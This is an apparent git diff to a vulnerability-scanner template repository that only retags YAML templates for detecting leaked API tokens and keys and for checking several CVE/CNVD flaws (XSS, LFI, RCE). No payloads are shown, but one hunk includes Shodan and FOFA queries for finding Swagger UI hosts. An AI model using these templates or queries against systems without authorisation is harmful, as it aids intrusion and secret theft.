- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go
metadata:
verified: true
- tags: dropbox,file,token
+ tags: file,keys,dropbox,token
file:
- extensions:
diff --git a/file/keys/dropbox/dropbox-shortlived-token.yaml b/file/keys/dropbox/dropbox-shortlived-token.yaml
index 7cb2b2a953..5bfe78cba3 100644
--- a/file/keys/dropbox/dropbox-shortlived-token.yaml
+++ b/file/keys/dropbox/dropbox-shortlived-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go
metadata:
verified: true
- tags: dropbox,file,token
+ tags: file,keys,dropbox,token
file:
- extensions:
diff --git a/file/keys/duffel-api-token.yaml b/file/keys/duffel-api-token.yaml
index cef0586d9d..1f84ca9834 100644
--- a/file/keys/duffel-api-token.yaml
+++ b/file/keys/duffel-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go
metadata:
verified: true
- tags: duffel,file,token
+ tags: keys,file,duffel,token
file:
- extensions:
- all
diff --git a/file/keys/dynatrace-token.yaml b/file/keys/dynatrace-token.yaml
index d795c227d0..305b9e086c 100644
--- a/file/keys/dynatrace-token.yaml
+++ b/file/keys/dynatrace-token.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/easypost/easypost-api-token.yaml b/file/keys/easypost/easypost-api-token.yaml
index 8d6455c987..e416beecac 100644
--- a/file/keys/easypost/easypost-api-token.yaml
+++ b/file/keys/easypost/easypost-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml
metadata:
verified: true
- tags: easypost,file,token
+ tags: file,keys,easypost,token
file:
- extensions:
diff --git a/file/keys/easypost/easypost-test-token.yaml b/file/keys/easypost/easypost-test-token.yaml
index a0e724024a..8226b83f4e 100644
--- a/file/keys/easypost/easypost-test-token.yaml
+++ b/file/keys/easypost/easypost-test-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml
metadata:
verified: true
- tags: easypost,file,token
+ tags: file,keys,easypost,token
file:
- extensions:
diff --git a/file/keys/etsy-access-token.yaml b/file/keys/etsy-access-token.yaml
index 1c30e875c0..335e2f8b73 100644
--- a/file/keys/etsy-access-token.yaml
+++ b/file/keys/etsy-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go
metadata:
verified: true
- tags: etsy,file,token
+ tags: file,keys,etsy,token
file:
- extensions:
- all
diff --git a/file/keys/facebook/facebook-api-token.yaml b/file/keys/facebook/facebook-api-token.yaml
index 3b6126349a..a4585d9a69 100644
--- a/file/keys/facebook/facebook-api-token.yaml
+++ b/file/keys/facebook/facebook-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go
metadata:
verified: true
- tags: facebook,file,token
+ tags: keys,file,facebook,token
file:
- extensions:
diff --git a/file/keys/facebook/facebook-client-id.yaml b/file/keys/facebook/facebook-client-id.yaml
index 28a54a26a6..bd0e212839 100644
--- a/file/keys/facebook/facebook-client-id.yaml
+++ b/file/keys/facebook/facebook-client-id.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: token,file,facebook
+ tags: keys,file,token,facebook
file:
- extensions:
diff --git a/file/keys/facebook/facebook-secret.yaml b/file/keys/facebook/facebook-secret.yaml
index 3f52e44e9e..2459bac18d 100644
--- a/file/keys/facebook/facebook-secret.yaml
+++ b/file/keys/facebook/facebook-secret.yaml
@@ -5,7 +5,7 @@ info:
author: gaurang
severity: low
description: Facebook secret key token was detected.
- tags: token,file,facebook
+ tags: keys,file,token,facebook
file:
- extensions:
diff --git a/file/keys/facebook/fb-access-token.yaml b/file/keys/facebook/fb-access-token.yaml
index b0442b9272..5032cc5091 100644
--- a/file/keys/facebook/fb-access-token.yaml
+++ b/file/keys/facebook/fb-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://developers.facebook.com/docs/facebook-login/access-tokens/
metadata:
verified: true
- tags: facebook,token,file
+ tags: file,keys,facebook,token
file:
- extensions:
diff --git a/file/keys/fastly-api-token.yaml b/file/keys/fastly-api-token.yaml
index 02ee17c702..fc84ed63d6 100644
--- a/file/keys/fastly-api-token.yaml
+++ b/file/keys/fastly-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go
metadata:
verified: true
- tags: fastly,file,token
+ tags: keys,file,fastly,token
file:
- extensions:
- all
diff --git a/file/keys/fcm-api-key.yaml b/file/keys/fcm-api-key.yaml
index 9e4321c76a..5b522f2293 100644
--- a/file/keys/fcm-api-key.yaml
+++ b/file/keys/fcm-api-key.yaml
@@ -4,7 +4,7 @@ info:
name: Firebase Cloud Messaging Token
author: Devang-Solanki
severity: medium
- tags: token,file,fcm,firebase,google
+ tags: file,keys,token,fcm,firebase,google
file:
- extensions:
- all
diff --git a/file/keys/figma-access-token.yaml b/file/keys/figma-access-token.yaml
index b6c25b5ea0..0ac82e862c 100644
--- a/file/keys/figma-access-token.yaml
+++ b/file/keys/figma-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://www.figma.com/developers/api
metadata:
verified: true
- tags: figma,file,token
+ tags: file,keys,figma,token
file:
- extensions:
- all
diff --git a/file/keys/finicity/finicity-api-token.yaml b/file/keys/finicity/finicity-api-token.yaml
index 340f473fc0..ac60918741 100644
--- a/file/keys/finicity/finicity-api-token.yaml
+++ b/file/keys/finicity/finicity-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go
metadata:
verified: true
- tags: finicity,file,token
+ tags: file,keys,finicity,token
file:
- extensions:
- all
diff --git a/file/keys/finicity/finicity-client-secret.yaml b/file/keys/finicity/finicity-client-secret.yaml
index db35247705..2708f526fc 100644
--- a/file/keys/finicity/finicity-client-secret.yaml
+++ b/file/keys/finicity/finicity-client-secret.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go
metadata:
verified: true
- tags: finicity,file,token
+ tags: file,keys,finicity,token
file:
- extensions:
- all
diff --git a/file/keys/finnhub-access-token.yaml b/file/keys/finnhub-access-token.yaml
index e6e22a65fa..b79dfaaa00 100644
--- a/file/keys/finnhub-access-token.yaml
+++ b/file/keys/finnhub-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go
metadata:
verified: true
- tags: finnhub,file,token
+ tags: file,keys,finnhub,token
file:
- extensions:
- all
diff --git a/file/keys/firebase-database.yaml b/file/keys/firebase-database.yaml
index 5add03dc6c..2490779adf 100644
--- a/file/keys/firebase-database.yaml
+++ b/file/keys/firebase-database.yaml
@@ -4,7 +4,7 @@ info:
name: Firebase Database Detect
author: gaurang
severity: info
- tags: token,file,firebase
+ tags: file,keys,token,firebase
file:
- extensions:
- all
diff --git a/file/keys/gcp-service-account.yaml b/file/keys/gcp-service-account.yaml
index bbf46ef2a0..8a77470417 100644
--- a/file/keys/gcp-service-account.yaml
+++ b/file/keys/gcp-service-account.yaml
@@ -4,7 +4,7 @@ info:
name: Google (GCP) Service-account
author: gaurang
severity: low
- tags: token,file,google
+ tags: file,keys,token,google
file:
- extensions:
- all
diff --git a/file/keys/github/github-app-token.yaml b/file/keys/github/github-app-token.yaml
index e4e0e08028..86d65e1e5b 100644
--- a/file/keys/github/github-app-token.yaml
+++ b/file/keys/github/github-app-token.yaml
@@ -4,7 +4,7 @@ info:
name: Github App Token
author: tanq16,DhiyaneshDK
severity: medium
- tags: token,file,github
+ tags: keys,file,token,github
file:
- extensions:
- all
diff --git a/file/keys/github/github-oauth-token.yaml b/file/keys/github/github-oauth-token.yaml
index a72ffb90f3..07eddaa0db 100644
--- a/file/keys/github/github-oauth-token.yaml
+++ b/file/keys/github/github-oauth-token.yaml
@@ -4,7 +4,7 @@ info:
name: Github OAuth Access Token
author: tanq16
severity: high
- tags: token,file,github
+ tags: file,keys,token,github
file:
- extensions:
- all
diff --git a/file/keys/github/github-outdated-key.yaml b/file/keys/github/github-outdated-key.yaml
index 105e18d691..e2d97a10b2 100644
--- a/file/keys/github/github-outdated-key.yaml
+++ b/file/keys/github/github-outdated-key.yaml
@@ -11,7 +11,7 @@ info:
- https://web.archive.org/web/20230316194229/https://docs.github.com/en/enterprise-cloud@latest/authentication/keeping-your-account-and-data-secure/githubs-ssh-key-fingerprints
metadata:
verified: true
- tags: file,github,ssh,rsa
+ tags: file,keys,github,ssh,rsa
file:
- extensions:
- all
diff --git a/file/keys/github/github-personal-token.yaml b/file/keys/github/github-personal-token.yaml
index 869cf6356d..1974242eac 100644
--- a/file/keys/github/github-personal-token.yaml
+++ b/file/keys/github/github-personal-token.yaml
@@ -4,7 +4,7 @@ info:
name: Github Personal Token
author: geeknik
severity: high
- tags: token,file,github
+ tags: file,keys,token,github
file:
- extensions:
- all
diff --git a/file/keys/github/github-refresh-token.yaml b/file/keys/github/github-refresh-token.yaml
index ce7e551099..718e852c33 100644
--- a/file/keys/github/github-refresh-token.yaml
+++ b/file/keys/github/github-refresh-token.yaml
@@ -4,7 +4,7 @@ info:
name: Github Refresh Token
author: tanq16
severity: high
- tags: token,file,github
+ tags: file,keys,token,github
file:
- extensions:
- all
diff --git a/file/keys/gitlab/gitlab-personal-accesstoken.yaml b/file/keys/gitlab/gitlab-personal-accesstoken.yaml
index 4c9995d9b3..6a29479bb7 100644
--- a/file/keys/gitlab/gitlab-personal-accesstoken.yaml
+++ b/file/keys/gitlab/gitlab-personal-accesstoken.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html
metadata:
verified: true
- tags: gitlab,token,file
+ tags: file,keys,gitlab,token
file:
- extensions:
- all
diff --git a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml
index 92ee6b04ae..d8c0570f8d 100644
--- a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml
+++ b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml
@@ -11,7 +11,7 @@ info:
- https://gitlab.com/gitlab-org/gitlab/-/issues/388379
metadata:
verified: true
- tags: gitlab,token,file
+ tags: keys,file,gitlab,token
file:
- extensions:
- all
diff --git a/file/keys/gitlab/gitlab-runner-regtoken.yaml b/file/keys/gitlab/gitlab-runner-regtoken.yaml
index b4aaa953a8..6731a26a66 100644
--- a/file/keys/gitlab/gitlab-runner-regtoken.yaml
+++ b/file/keys/gitlab/gitlab-runner-regtoken.yaml
@@ -11,7 +11,7 @@ info:
- https://docs.gitlab.com/ee/security/token_overview.html#security-considerations
metadata:
verified: true
- tags: gitlab,runner,token,file
+ tags: keys,file,gitlab,runner,token
file:
- extensions:
- all
diff --git a/file/keys/google/google-api.yaml b/file/keys/google/google-api.yaml
index a9ecc5e465..10f4cfbc76 100644
--- a/file/keys/google/google-api.yaml
+++ b/file/keys/google/google-api.yaml
@@ -4,7 +4,7 @@ info:
name: Google API key
author: gaurang
severity: info
- tags: token,file,google
+ tags: keys,file,token,google
file:
- extensions:
- all
diff --git a/file/keys/google/google-clientid.yaml b/file/keys/google/google-clientid.yaml
index 3f18e6ac6f..25d3fbad36 100644
--- a/file/keys/google/google-clientid.yaml
+++ b/file/keys/google/google-clientid.yaml
@@ -8,7 +8,7 @@ info:
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml
metadata:
verified: true
- tags: google,token,file
+ tags: file,keys,google,token
file:
- extensions:
- all
diff --git a/file/keys/google/google-oauth-clientsecret.yaml b/file/keys/google/google-oauth-clientsecret.yaml
index c04ee93606..42297c45d4 100644
--- a/file/keys/google/google-oauth-clientsecret.yaml
+++ b/file/keys/google/google-oauth-clientsecret.yaml
@@ -8,7 +8,7 @@ info:
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml
metadata:
verified: true
- tags: google,token,file
+ tags: file,keys,google,token
file:
- extensions:
- all
diff --git a/file/keys/heroku-key.yaml b/file/keys/heroku-key.yaml
index 536535734e..b93a7cec54 100644
--- a/file/keys/heroku-key.yaml
+++ b/file/keys/heroku-key.yaml
@@ -9,7 +9,7 @@ info:
- https://devcenter.heroku.com/articles/authentication
metadata:
verified: true
- tags: heroku,token,file
+ tags: file,keys,heroku,token
file:
- extensions:
- all
diff --git a/file/keys/jenkins-token.yaml b/file/keys/jenkins-token.yaml
index a7c5e78fd6..c4346b4a56 100644
--- a/file/keys/jenkins-token.yaml
+++ b/file/keys/jenkins-token.yaml
@@ -10,7 +10,7 @@ info:
- https://www.jenkins.io/doc/book/security/csrf-protection/
metadata:
verified: true
- tags: jenkins,crumb,token,file
+ tags: file,keys,jenkins,crumb,token
file:
- extensions:
- all
diff --git a/file/keys/linkedin-id.yaml b/file/keys/linkedin-id.yaml
index 5f071d9886..fd03ba9937 100644
--- a/file/keys/linkedin-id.yaml
+++ b/file/keys/linkedin-id.yaml
@@ -4,7 +4,7 @@ info:
name: Linkedin Client ID
author: gaurang
severity: low
- tags: token,file,linkedin
+ tags: file,keys,token,linkedin
file:
- extensions:
- all
diff --git a/file/keys/mailchimp-api.yaml b/file/keys/mailchimp-api.yaml
index 09657f0502..26afea94f5 100644
--- a/file/keys/mailchimp-api.yaml
+++ b/file/keys/mailchimp-api.yaml
@@ -4,7 +4,7 @@ info:
name: Mailchimp API Key
author: gaurang
severity: high
- tags: token,file,mailchimp
+ tags: keys,file,token,mailchimp
file:
- extensions:
- all
diff --git a/file/keys/mailgun-api.yaml b/file/keys/mailgun-api.yaml
index 0c3db4d856..a38ccd49bf 100644
--- a/file/keys/mailgun-api.yaml
+++ b/file/keys/mailgun-api.yaml
@@ -4,7 +4,7 @@ info:
name: Mailgun API Key
author: gaurang
severity: high
- tags: token,file,mailgun
+ tags: file,keys,token,mailgun
file:
- extensions:
- all
diff --git a/file/keys/mapbox-token.yaml b/file/keys/mapbox-token.yaml
index dd5c6d2670..a7b2ed7ea9 100644
--- a/file/keys/mapbox-token.yaml
+++ b/file/keys/mapbox-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go
metadata:
verified: true
- tags: token,file,mapbox
+ tags: file,keys,token,mapbox
file:
- extensions:
- all
diff --git a/file/keys/newrelic/newrelic-pixie-apikey.yaml b/file/keys/newrelic/newrelic-pixie-apikey.yaml
index d6b0a88f2e..eac36ad7ef 100644
--- a/file/keys/newrelic/newrelic-pixie-apikey.yaml
+++ b/file/keys/newrelic/newrelic-pixie-apikey.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.px.dev/reference/admin/api-keys/
metadata:
verified: true
- tags: newrelic,pixie,token,file
+ tags: file,keys,newrelic,pixie,token
file:
- extensions:
- all
diff --git a/file/keys/newrelic/newrelic-pixie-deploykey.yaml b/file/keys/newrelic/newrelic-pixie-deploykey.yaml
index efa75eb263..1f6dc6a74f 100644
--- a/file/keys/newrelic/newrelic-pixie-deploykey.yaml
+++ b/file/keys/newrelic/newrelic-pixie-deploykey.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.px.dev/reference/admin/api-keys/
metadata:
verified: true
- tags: newrelic,pixie,token,file
+ tags: file,keys,newrelic,pixie,token
file:
- extensions:
- all
diff --git a/file/keys/npm-accesstoken.yaml b/file/keys/npm-accesstoken.yaml
index 25acd53f1f..d37b0e379a 100644
--- a/file/keys/npm-accesstoken.yaml
+++ b/file/keys/npm-accesstoken.yaml
@@ -11,7 +11,7 @@ info:
- https://github.blog/changelog/2022-12-06-limit-scope-of-npm-tokens-with-the-new-granular-access-tokens/
metadata:
verified: true
- tags: npm,token,file
+ tags: keys,file,npm,token
file:
- extensions:
- all
diff --git a/file/keys/nuget-key.yaml b/file/keys/nuget-key.yaml
index d2d62934a5..eb5a498c62 100644
--- a/file/keys/nuget-key.yaml
+++ b/file/keys/nuget-key.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.microsoft.com/en-us/nuget/nuget-org/publish-a-package#create-api-keys
metadata:
verified: true
- tags: nuget,token,file
+ tags: keys,file,nuget,token
file:
- extensions:
- all
diff --git a/file/keys/openai-key.yaml b/file/keys/openai-key.yaml
index cbf3694c31..9ec1ac9b27 100644
--- a/file/keys/openai-key.yaml
+++ b/file/keys/openai-key.yaml
@@ -10,7 +10,7 @@ info:
- https://platform.openai.com/docs/api-reference/authentication
metadata:
verified: true
- tags: openai,token,file
+ tags: file,keys,openai,token
file:
- extensions:
- all
diff --git a/file/keys/paypal-braintree-token.yaml b/file/keys/paypal-braintree-token.yaml
index 7b6e80e01e..e3f63933ef 100644
--- a/file/keys/paypal-braintree-token.yaml
+++ b/file/keys/paypal-braintree-token.yaml
@@ -4,7 +4,7 @@ info:
name: Paypal Braintree Access Token
author: gaurang
severity: high
- tags: token,file,paypal
+ tags: file,keys,token,paypal
file:
- extensions:
- all
diff --git a/file/keys/pictatic-api-key.yaml b/file/keys/pictatic-api-key.yaml
index 41ea01a136..4efcaf3a8c 100644
--- a/file/keys/pictatic-api-key.yaml
+++ b/file/keys/pictatic-api-key.yaml
@@ -4,7 +4,7 @@ info:
name: Pictatic API Key
author: gaurang
severity: high
- tags: token,file
+ tags: keys,file,token
file:
- extensions:
- all
diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml
index bc2ce2bb9d..c5febddcd7 100644
--- a/file/keys/private-key.yaml
+++ b/file/keys/private-key.yaml
@@ -4,7 +4,7 @@ info:
name: Private Key Detect
author: gaurang,geeknik
severity: high
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/pypi-token.yaml b/file/keys/pypi-token.yaml
index cdc3ef1dbe..f578c503b4 100644
--- a/file/keys/pypi-token.yaml
+++ b/file/keys/pypi-token.yaml
@@ -10,7 +10,7 @@ info:
- https://pypi.org/project/pypitoken/
metadata:
verified: true
- tags: pypi,token,file
+ tags: file,keys,pypi,token
file:
- extensions:
- all
diff --git a/file/keys/razorpay-client-id.yaml b/file/keys/razorpay-client-id.yaml
index 3c3165359b..f08ef2e761 100644
--- a/file/keys/razorpay-client-id.yaml
+++ b/file/keys/razorpay-client-id.yaml
@@ -7,7 +7,7 @@ info:
reference:
- https://github.com/streaak/keyhacks#Razorpay-keys
- https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey
- tags: token,file,razorpay
+ tags: file,keys,token,razorpay
file:
- extensions:
- all
diff --git a/file/keys/rubygems-key.yaml b/file/keys/rubygems-key.yaml
index 6fd748c2ef..512cbed45a 100644
--- a/file/keys/rubygems-key.yaml
+++ b/file/keys/rubygems-key.yaml
@@ -10,7 +10,7 @@ info:
- https://guides.rubygems.org/api-key-scopes/
metadata:
verified: true
- tags: rubygems,token,file,ruby
+ tags: file,keys,rubygems,token,ruby
file:
- extensions:
- all
diff --git a/file/keys/s3-bucket.yaml b/file/keys/s3-bucket.yaml
index d542011f1c..3c4b9bb6fa 100644
--- a/file/keys/s3-bucket.yaml
+++ b/file/keys/s3-bucket.yaml
@@ -4,7 +4,7 @@ info:
name: S3 Bucket Detect
author: gaurang
severity: info
- tags: token,file,bucket
+ tags: file,keys,token,bucket
file:
- extensions:
- all
diff --git a/file/keys/sauce-access-token.yaml b/file/keys/sauce-access-token.yaml
index 2a2e59de29..76a8e88cd0 100644
--- a/file/keys/sauce-access-token.yaml
+++ b/file/keys/sauce-access-token.yaml
@@ -8,7 +8,7 @@ info:
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/sauce.yml
metadata:
verified: true
- tags: sauce,token,file
+ tags: file,keys,sauce,token
file:
- extensions:
- all
diff --git a/file/keys/segment-public-api.yaml b/file/keys/segment-public-api.yaml
index 3bb96aeace..5af0340aae 100644
--- a/file/keys/segment-public-api.yaml
+++ b/file/keys/segment-public-api.yaml
@@ -10,7 +10,7 @@ info:
- https://segment.com/blog/how-segment-proactively-protects-customer-api-tokens/
metadata:
verified: true
- tags: segment,token,file
+ tags: keys,file,segment,token
file:
- extensions:
- all
diff --git a/file/keys/sendgrid-api.yaml b/file/keys/sendgrid-api.yaml
index f8d5d81271..0166cbcd46 100644
--- a/file/keys/sendgrid-api.yaml
+++ b/file/keys/sendgrid-api.yaml
@@ -4,7 +4,7 @@ info:
name: Sendgrid API Key
author: gaurang
severity: high
- tags: token,file,sendgrid
+ tags: keys,file,token,sendgrid
file:
- extensions:
- all
diff --git a/file/keys/shopify-custom-token.yaml b/file/keys/shopify-custom-token.yaml
index 633272cb11..b4f6f5ea21 100644
--- a/file/keys/shopify-custom-token.yaml
+++ b/file/keys/shopify-custom-token.yaml
@@ -4,7 +4,7 @@ info:
name: Shopify Custom App Access Token
author: gaurang
severity: high
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/shopify-private-token.yaml b/file/keys/shopify-private-token.yaml
index bd7661b886..22235d6c3f 100644
--- a/file/keys/shopify-private-token.yaml
+++ b/file/keys/shopify-private-token.yaml
@@ -4,7 +4,7 @@ info:
name: Shopify Private App Access Token
author: gaurang
severity: high
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/shopify-public-access.yaml b/file/keys/shopify-public-access.yaml
index 8f1fd3c6a0..2526614ddf 100644
--- a/file/keys/shopify-public-access.yaml
+++ b/file/keys/shopify-public-access.yaml
@@ -10,7 +10,7 @@ info:
- https://shopify.dev/changelog/app-secret-key-length-has-increased
metadata:
verified: true
- tags: shopify,token,file
+ tags: file,keys,shopify,token
file:
- extensions:
- all
diff --git a/file/keys/shopify-shared-secret.yaml b/file/keys/shopify-shared-secret.yaml
index 5385f63e94..64bf68a6e3 100644
--- a/file/keys/shopify-shared-secret.yaml
+++ b/file/keys/shopify-shared-secret.yaml
@@ -4,7 +4,7 @@ info:
name: Shopify Shared Secret
author: gaurang
severity: high
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/shopify-token.yaml b/file/keys/shopify-token.yaml
index 2ca1c829f5..5dd2255b16 100644
--- a/file/keys/shopify-token.yaml
+++ b/file/keys/shopify-token.yaml
@@ -4,7 +4,7 @@ info:
name: Shopify Access Token
author: gaurang
severity: high
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/slack-api.yaml b/file/keys/slack-api.yaml
index 6f17ee55d5..99277133e0 100644
--- a/file/keys/slack-api.yaml
+++ b/file/keys/slack-api.yaml
@@ -4,7 +4,7 @@ info:
name: Slack API Key
author: gaurang
severity: high
- tags: token,file,slack
+ tags: file,keys,token,slack
file:
- extensions:
- all
diff --git a/file/keys/slack-webhook.yaml b/file/keys/slack-webhook.yaml
index c44af0fefa..6cc369ad33 100644
--- a/file/keys/slack-webhook.yaml
+++ b/file/keys/slack-webhook.yaml
@@ -4,7 +4,7 @@ info:
name: Slack Webhook
author: gaurang
severity: high
- tags: token,file,slack
+ tags: file,keys,token,slack
file:
- extensions:
- all
diff --git a/file/keys/square-access-token.yaml b/file/keys/square-access-token.yaml
index 185bedae17..3ade556da4 100644
--- a/file/keys/square-access-token.yaml
+++ b/file/keys/square-access-token.yaml
@@ -4,7 +4,7 @@ info:
name: Square Access Token
author: gaurang,daffainfo
severity: high
- tags: token,file,square
+ tags: file,keys,token,square
file:
- extensions:
- all
diff --git a/file/keys/square-oauth-secret.yaml b/file/keys/square-oauth-secret.yaml
index bc2af245f7..c49516759a 100644
--- a/file/keys/square-oauth-secret.yaml
+++ b/file/keys/square-oauth-secret.yaml
@@ -4,7 +4,7 @@ info:
name: Square OAuth Secret
author: gaurang
severity: high
- tags: token,file,square
+ tags: file,keys,token,square
file:
- extensions:
- all
diff --git a/file/keys/stackhawk-api-key.yaml b/file/keys/stackhawk-api-key.yaml
index 0f1688cec2..5f15720bd5 100644
--- a/file/keys/stackhawk-api-key.yaml
+++ b/file/keys/stackhawk-api-key.yaml
@@ -8,7 +8,7 @@ info:
- https://docs.stackhawk.com/apidocs.html
metadata:
verified: true
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/stripe-api-key.yaml b/file/keys/stripe-api-key.yaml
index a5ea66caf7..42d18a504d 100644
--- a/file/keys/stripe-api-key.yaml
+++ b/file/keys/stripe-api-key.yaml
@@ -4,7 +4,7 @@ info:
name: Stripe API Key
author: gaurang
severity: high
- tags: token,file,stripe
+ tags: file,keys,token,stripe
file:
- extensions:
- all
diff --git a/file/keys/telegram-token.yaml b/file/keys/telegram-token.yaml
index 9ab9575668..c556a71701 100644
--- a/file/keys/telegram-token.yaml
+++ b/file/keys/telegram-token.yaml
@@ -10,7 +10,7 @@ info:
- https://core.telegram.org/bots/features#botfather
metadata:
verified: true
- tags: telegram,token,file
+ tags: file,keys,telegram,token
file:
- extensions:
- all
diff --git a/file/keys/twilio-api.yaml b/file/keys/twilio-api.yaml
index 94674dffe2..46a2dab12c 100644
--- a/file/keys/twilio-api.yaml
+++ b/file/keys/twilio-api.yaml
@@ -4,7 +4,7 @@ info:
name: Twilio API Key
author: gaurang
severity: high
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/twitter-secret.yaml b/file/keys/twitter-secret.yaml
index 0a89da00fa..56176aac1d 100644
--- a/file/keys/twitter-secret.yaml
+++ b/file/keys/twitter-secret.yaml
@@ -4,7 +4,7 @@ info:
name: Twitter Secret
author: gaurang,daffainfo
severity: medium
- tags: token,file,twitter
+ tags: file,keys,token,twitter
file:
- extensions:
- all
diff --git a/file/keys/zapier-webhook.yaml b/file/keys/zapier-webhook.yaml
index 137e5dbe48..c5af462a53 100644
--- a/file/keys/zapier-webhook.yaml
+++ b/file/keys/zapier-webhook.yaml
@@ -7,7 +7,7 @@ info:
reference:
- https://github.com/streaak/keyhacks#Zapier-Webhook-Token
- https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url
- tags: token,file,zapier
+ tags: file,keys,token,zapier
file:
- extensions:
- all
diff --git a/file/url-analyse/url-extension-inspector.yaml b/file/url-analyse/url-extension-inspector.yaml
index b433d1ce1b..2486f858f2 100644
--- a/file/url-analyse/url-extension-inspector.yaml
+++ b/file/url-analyse/url-extension-inspector.yaml
@@ -8,7 +8,7 @@ info:
This template assists you in discovering intriguing extensions within a list of URLs.
reference:
- https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/
- tags: file,urls,extension
+ tags: file,url-analyse,urls,extension
file:
- extensions:
- all
diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml
index 48cf8c8b71..d00d78575e 100644
--- a/headless/cves/2018/CVE-2018-25031.yaml
+++ b/headless/cves/2018/CVE-2018-25031.yaml
@@ -29,7 +29,7 @@ info:
product: swagger_ui
shodan-query: http.component:"Swagger"
fofa-query: icon_hash="-1180440057"
- tags: cve,cve2018,headless,swagger,xss
+ tags: headless,cve,cve2018,swagger,xss,smartbear
headless:
- steps:
diff --git a/http/cnvd/2018/CNVD-2018-13393.yaml b/http/cnvd/2018/CNVD-2018-13393.yaml
index dd442a9889..48aca84bfa 100644
--- a/http/cnvd/2018/CNVD-2018-13393.yaml
+++ b/http/cnvd/2018/CNVD-2018-13393.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-22
metadata:
max-request: 1
- tags: metinfo,cnvd,cvnd2018,lfi
+ tags: cnvd2018,cnvd,metinfo,cvnd2018,lfi
http:
- method: GET
diff --git a/http/cnvd/2019/CNVD-2019-01348.yaml b/http/cnvd/2019/CNVD-2019-01348.yaml
index 725da0f9e4..c7524e3cac 100644
--- a/http/cnvd/2019/CNVD-2019-01348.yaml
+++ b/http/cnvd/2019/CNVD-2019-01348.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-284
metadata:
max-request: 1
- tags: xiuno,cnvd,cnvd2019
+ tags: cnvd2019,cnvd,xiuno
http:
- method: GET
diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml
index 206ca7150a..9c47cec765 100644
--- a/http/cnvd/2019/CNVD-2019-06255.yaml
+++ b/http/cnvd/2019/CNVD-2019-06255.yaml
@@ -15,7 +15,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 1
- tags: rce,cnvd,catfishcms,cnvd2019
+ tags: cnvd,cnvd2019,rce,catfishcms
http:
- method: GET
diff --git a/http/cnvd/2019/CNVD-2019-19299.yaml b/http/cnvd/2019/CNVD-2019-19299.yaml
index 93023ed805..7cc414bd11 100644
--- a/http/cnvd/2019/CNVD-2019-19299.yaml
+++ b/http/cnvd/2019/CNVD-2019-19299.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-77
metadata:
max-request: 2
- tags: zhiyuan,cnvd,cnvd2019,rce,intrusive
